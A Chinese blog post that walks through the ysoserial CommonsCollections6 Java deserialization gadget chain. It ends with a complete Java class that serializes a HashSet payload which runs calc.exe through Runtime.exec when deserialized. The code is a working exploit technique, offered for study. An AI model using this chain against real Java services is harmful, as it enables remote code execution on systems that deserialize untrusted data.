利用链如下:

其中LazyMap.get()->ChainedTransformer.transform()-InvokerTransformer.transform()与CC1链一致。

/*

	Gadget chain:

	    java.io.ObjectInputStream.readObject()

            java.util.HashSet.readObject()

                java.util.HashMap.put()

                java.util.HashMap.hash()

                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()

                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()

                        org.apache.commons.collections.map.LazyMap.get()

                            org.apache.commons.collections.functors.ChainedTransformer.transform()

                            org.apache.commons.collections.functors.InvokerTransformer.transform()

                            java.lang.reflect.Method.invoke()

                                java.lang.Runtime.exec()

*/

1、InvokerTransformer.transform()因为Runtime类不实现Serializable接口,所以使用Class类对象反射构造Runtime对象来实现exec方法。InvokerTransformer.transform()具备反射执行能力。

Class cr = Class.forName("java.lang.Runtime");

        Method getMethod = (Method) new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}).transform(cr);

        Runtime runtime = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null,null}).transform(getMethod);

        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"}).transform(runtime);

2、ChainedTransformer.transform()

使用ChainedTransformer构造方法,给iTransformers赋值,在transform中执行iTransformers所有元组的transform,transform传入的参数为前一个元组的对象。所以这个方法可以对步骤1中链执行。

public ChainedTransformer(Transformer[] transformers) {

    super();

    iTransformers = transformers;

}

public Object transform(Object object) {

    for (int i = 0; i < iTransformers.length; i++) {

        object = iTransformers[i].transform(object);

    }

    return object;

}

创建一个Transformer[],包含步骤1中所有对象。

Transformer[] transformers = {

                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),

                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),

                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})

};

由于步骤1中cr对象是Class对象,不实现Transformer接口。通过ConstantTransformer的transform方法得到一个实现Transformer的方法。

public ConstantTransformer(Object constantToReturn) {

	super();

	iConstant = constantToReturn;

}

public Object transform(Object input) {

	return iConstant;

}

所以最终得到的transformers是

public static void main(String[] args) throws Exception {

//        Class cr = Class.forName("java.lang.Runtime");

        ;

        Transformer[] transformers = {

                new ConstantTransformer(Class.forName("java.lang.Runtime")),

                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),

                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),

                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})

        };

        new ChainedTransformer(transformers).transform(1);

    //calc.exe

    }

3、LazyMap.get()

LazyMap类的get方法实现了,对factory的transform。factory的decorate方法实现了对factory的赋值,Transformer类型

所以向decorate传入new ChainedTransformer(transformers),最终调用get来实现new ChainedTransformer(transformers)的transform。

public static Map decorate(Map map, Transformer factory) {

        return new LazyMap(map, factory);

}

public Object get(Object key) {

    // create value for key if key is not currently in the map

    if (map.containsKey(key) == false) {

        Object value = factory.transform(key);

        map.put(key, value);

        return value;

    }

    return map.get(key);

}

当然调用get方法的时候,如果key是不存在的才会执行factory.transform(key),所以最终的调用

Transformer transformer = new ChainedTransformer(transformers);

Map map = new HashMap();

map.put(1,"hello");

Map lazyMap = LazyMap.decorate(map, transformer);

lazyMap.get(2);

//calc.exe

4、TiedMapEntry

根据利用链,下一步通过TiedMapEntry构造方法传入map和key,通过getValue实现对map参数的get操作,所以将lazyMap和一个不存在的key作为参数传入。

public TiedMapEntry(Map map, Object key) {

        super();

        this.map = map;

        this.key = key;

}

public Object getValue() {

        return map.get(key);

}

利用链

TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 2);

tiedMapEntry.getValue();

再看TiedMapEntry的hashCode方法,实现了getValue()的调用。

public int hashCode() {

        Object value = getValue();

        return (getKey() == null ? 0 : getKey().hashCode()) ^

               (value == null ? 0 : value.hashCode());

}

利用链

TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 2);

tiedMapEntry.hashcode();

5、HashMap

hashmap的hash实现了对参数key的hashcode方法,put方法实现了hash方法

static final int hash(Object key) {

        int h;

        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);

}

public V put(K key, V value) {

        return putVal(hash(key), key, value, false, true);

}

利用链

Map hashmap = new HashMap();

hashmap.put(tiedMapEntry,1);

//calc.exe

6、HashSet

根据利用链看HashSet类的readobject(),由于map = new HashMap<>(),最终实现了在readobject中调用了hashmap.put方法。

private void readObject(java.io.ObjectInputStream s)

        throws java.io.IOException, ClassNotFoundException {

        ...

        // Read in all elements in the proper order.

        for (int i=0; i<size; i++) {

            @SuppressWarnings("unchecked")

                E e = (E) s.readObject();

            map.put(e, PRESENT);

        }

    }

利用链

HashSet hashSet = new HashSet();

hashSet.add(tiedMapEntry);

ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D:\\cc6.ser"));

objectOutputStream.writeObject(hashSet);

ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D:\\cc6.ser"));

objectInputStream.readObject();

由于在TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 2)中实际执行的lazyMap.get(2)。

public Object getValue() {

        return map.get(key);

}

lazyMap.get(2)该执行过程中,如果lazyMap不存在key,会对lazyMap储值。

public Object get(Object key) {

        // create value for key if key is not currently in the map

        if (map.containsKey(key) == false) {

            Object value = factory.transform(key);

            map.put(key, value);

            return value;

        }

        return map.get(key);

}

所以在做序列化的时候实际lazyMap中已经存在了key=2,反序列化的时候map.containsKey(key) == false不成立,在反序列化过程中无法成功执行Object value = factory.transform(key);

在序列化之前需要将该key移除

lazyMap.remove(2);

优化:

由于hashSet.add(tiedMapEntry);中,执行了map.put(tiedMapEntry),最终会在本地执行exec。

public boolean add(E e) {

        return map.put(e, PRESENT)==null;

}

在一开始可以对transformers赋空值,在序列化之前再对ChainedTransformer类产生的transformer的iTransformers通过反射做修改,将实际执行的exec执行链传入。

Transformer[] transformers = {};

Transformer[] transformerslist = {

	new ConstantTransformer(Class.forName("java.lang.Runtime")),

	new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),

	new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),

	new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})

};

Field field = ChainedTransformer.class.getDeclaredField("iTransformers");

field.setAccessible(true);

field.set(transformer, transformerslist);

最终的利用链

public class CC6Test1 {

    public static void main(String[] args) throws Exception {

        Transformer[] transformers = {};

        Transformer[] transformerslist = {

                new ConstantTransformer(Class.forName("java.lang.Runtime")),

                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),

                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),

                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})

        };

        Transformer transformer = new ChainedTransformer(transformers);

        Map map = new HashMap();

        map.put(1,"hello");

        Map lazyMap = LazyMap.decorate(map, transformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 2);

        HashSet hashSet = new HashSet();

        hashSet.add(tiedMapEntry);

        lazyMap.remove(2);

        Field field = ChainedTransformer.class.getDeclaredField("iTransformers");

        field.setAccessible(true);

        field.set(transformer, transformerslist);

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D:\\cc6.ser"));

        objectOutputStream.writeObject(hashSet);

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D:\\cc6.ser"));

        objectInputStream.readObject();

    }

}

ysoserial commonscollections6 分析的更多相关文章

  1. ysoserial CommonsColletions4分析

    ysoserial CommonsColletions4分析 其实CC4就是 CC3前半部分和CC2后半部分 拼接组成的,没有什么新的知识点. 不过要注意的是,CC4和CC2一样需要在commons- ...

  2. ysoserial CommonsColletions2分析

    ysoserial CommonsColletions2分析 前言 此文章是ysoserial中 commons-collections2 的分析文章,所需的知识包括java反射,javassist. ...

  3. ysoserial CommonsColletions1分析

    JAVA安全审计 ysoserial CommonsColletions1分析 前言: 在ysoserial工具中,并没有使用TransformedMap的来触发ChainedTransformer链 ...

  4. ysoserial CommonsCollections2 分析

    在最后一步的实现上,cc2和cc3一样,最终都是通过TemplatesImpl恶意字节码文件动态加载方式实现反序列化. 已知的TemplatesImpl->newTransformer()是最终 ...

  5. ysoserial CommonsColletions7分析

    CC7也是一条比较通用的链了,不过对于其原理的话,其实还是挺复杂的.文章如有错误,敬请大佬们斧正 CC7利用的是hashtable#readObject作为反序列化入口.AbstractMap的equ ...

  6. ysoserial CommonsColletions3分析(2)

    上篇文章讲到CC3的TransformedMap链,这篇我们就来讲一下LazyMap链. 其实LazyMap链还是使用的TemplatesImpl承载payload,InstantiateTransf ...

  7. ysoserial CommonsColletions3分析(1)

    CC3的利用链在JDK8u71版本以后是无法使用的,具体还是由于AnnotationInvocationHandler的readobject进行了改写. 而CC3目前有两条主流的利用链,利用Trans ...

  8. ysoserial CommonsColletions6分析

    CC6的话是一条比较通用的链,在JAVA7和8版本都可以使用,而触发点也是通过LazyMap的get方法. TiedMapEntry#hashCode 在CC5中,通过的是TiedMapEntry的t ...

  9. ysoserial CommonsColletions5分析

    我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写. 所以要挖掘出一条能替代的类BadAttributeValueExpE ...

随机推荐

  1. 使用Python3.7配合协同过滤算法(base on user,基于人)构建一套简单的精准推荐系统(个性化推荐)

    原文转载自「刘悦的技术博客」https://v3u.cn/a_id_136 时至2020年,个性化推荐可谓风生水起,Youtube,Netflix,甚至于Pornhub,这些在互联网上叱咤风云的流媒体 ...

  2. CVI中调用数据库的几点..

    1.各类开发工具开发的程序调用数据库,有两种方式:ADO和ODBC. 2.以ODBC方式访问SQL数据库,必须在电脑管理工具----ODBC管理器 中配置TCP/IP项(IP1.IP2.IP3.IPA ...

  3. 五,手写SpringMVC框架,过滤器的使用

    8. 过滤器 8.1 编写字符过滤器 CharacterEncodingFilter 复制项目mymvc4,新建项目mymvc5 package com.hy.filter; import java. ...

  4. SpringBoot Excel导入导出

    一.引入pom.xml依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifac ...

  5. 演示RabbitMQ的交换类型

    一.Direct exchange 新建一个名为direct_exchange的Direct exchange 添加队列direct_queue1 添加队列direct_queue2 direct_e ...

  6. [BZOJ3625][CF438E]小朋友和二叉树 (多项式开根,求逆)

    题面 题解 设多项式的第a项为权值和为a的二叉树个数,多项式的第a项表示是否为真,即 则,所以F是三个多项式的卷积,其中包括自己: ,1是F的常数项,即. 我们发现这是一个一元二次方程,可以求出,因为 ...

  7. Windows权限维持总结

    windows权限维持 注册服务 sc create 服务名 binpath= "cmd.exe /k 木马路径" start="auto" obj=" ...

  8. helm安装csi-driver-nfs-v4.1.0

    Application version v4.1.0 Chart version v4.1.0 获取chart包 helm repo add csi-driver-nfs https://raw.gi ...

  9. Node.js躬行记(22)——Node环境升级日志

    公司之前所有的 Node 项目,其环境都是 8.9.4 版本,发布于 2018 年的一个比较古老的版本. 老版本有两个比较明显的问题: Node 高版本的特性和方法都无法使用. 有些第三方新版本的包无 ...

  10. 第六章 部署node运算节点服务

    一.部署Kubelet 1.1 集群规划 主机名 角色 IP hdss7-21 kubelet 10.4.7.21 hdss7-22 kubelet 10.4.7.22 注意:部署以10.4.7.21 ...